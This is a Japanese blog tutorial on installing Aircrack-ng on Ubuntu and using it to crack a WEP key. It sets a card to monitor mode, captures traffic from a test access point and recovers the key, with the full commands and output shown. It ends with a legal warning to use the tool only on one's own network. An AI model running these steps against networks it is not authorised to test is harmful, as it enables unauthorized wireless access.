ubuntuでAircrack-ngを使ってみた 1
Eee PC 901-16Gにインストールしたubuntu 9.04でAircrack-ngを使ってみました。
Aircrack-ngで使用できる無線LANチップは、ここで確認できます。
Eee PC 901-16G標準のRalink RT2860 STAでは動きません。
Aircrack-ngのインストール
$ sudo aptitude install aircrack-ng
インストールされる主なツール類は、以下の通り。
無線LANカードをモニタモードへ
まずは、無線LANカードを使っているプロセスを確認します。
$ sudo airmon-ng check Found 5 processes that could cause trouble. If airodump-ng, aireplay-ng or airtun-ng stops working after a short period of time, you may want to kill (some of) them! PID Name 2720 NetworkManager 2741 wpa_supplicant 2745 avahi-daemon 2746 avahi-daemon 3303 dhclient Process with PID 3303 (dhclient) is running on interface wlan0
いろいろ動いてますが、とりあえず無線LANネットワークに接続している場合は、無線LANインタフェース(wlan0)を無効化します。
再度、プロセスを確認します。
$ sudo airmon-ng check Found 4 processes that could cause trouble. If airodump-ng, aireplay-ng or airtun-ng stops working after a short period of time, you may want to kill (some of) them! PID Name 2720 NetworkManager 2741 wpa_supplicant 2745 avahi-daemon 2746 avahi-daemon
dhclientの停止を確認し、モニタモードに移行します。
$ sudo airmon-ng start wlan0 Interface Chipset Driver wlan0 Intel 3945ABG iwl3945 - [phy0] (monitor mode enabled on mon0)
モニタモード移行後のインタフェース名は「mon0」となります。
モニタモードを停止する場合は、「stop」オプションを使います。
アクセスポイントの確認
モニタモードに移行したところで、以下のコマンドを実行しアクセスポイントの情報を収集します。
$ sudo airodump-ng mon0 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID XX:XX:XX:XX:XX:XX -87 3 0 0 7 54e WEP WEP TEST-AP BSSID STATION PWR Rate Lost Packets Probes XX:XX:XX:XX:XX:XX xx:xx:xx:xx:xx:xx -89 0 - 1 43 4
上段がアクセスポイント情報、下段がアクセスポイントに接続しているクライアント情報です。
パケットキャプチャ、解析
収集したアクセスポイント情報を元にパケットをキャプチャします。
$ sudo airodump-ng --channel 7 --bssid XX:XX:XX:XX:XX:XX -w wepcap mon0
ターゲットのアクセスポイントを指定して、パケットをキャプチャします。
「-w」オプションで保存するファイルを指定します。
上記の場合、「wepcap-01.cap」というファイル名で保存されます。
次に、保存したパケットキャプチャを解析します。
$ sudo aircrack-ng wepcap-01.cap Opening weptestcap-01.cap Read 278993 packets. # BSSID ESSID Encryption 1 XX:XX:XX:XX:XX:XX TEST-AP WEP (54632 IVs) Choosing first network as target. Opening wepcap-01.cap Attack will be restarted every 5000 captured ivs. Starting PTW attack with 54632 ivs. KEY FOUND! [ ZZ:ZZ:ZZ:ZZ:ZZ ] Decrypted correctly: 100%
解析には、3〜5万パケット程度、必要なようです。
まとめ
今回は、Aircrack-ngの基本的な使い方を確認しました。
アクセスポイントに接続されているクライアントが動画などを観ていれば、3〜5万のパケットも短時間でキャプチャ可能です。
次は、キャプチャできるパケットが少ない場合、アクセスポイントにクライアントが接続されていない場合、WEP以外の暗号化の場合などの環境下での使用を確認したいと思います。
最後に、ハッキング行為は「不正アクセス禁止法」に触れる犯罪ですので、Aircrack-ngの使用は自身の管理するネットワークで行ってください。
また、Aircrack-ngは、自己責任で使用してください。